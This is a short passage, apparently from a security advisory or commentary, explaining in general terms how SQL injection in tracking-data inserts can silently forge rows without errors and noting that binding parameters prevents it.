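The forged-row case is the quieter of the two outcomes: the probe produces a visible database error, which is what the advisory reports, but a payload that keeps the statement valid leaves no error at all and corrupts whatever the tracking data is later used for. Whether a database layer also allows stacked statements (and so more than row forgery) varies by driver; binding parameters removes both possibilities.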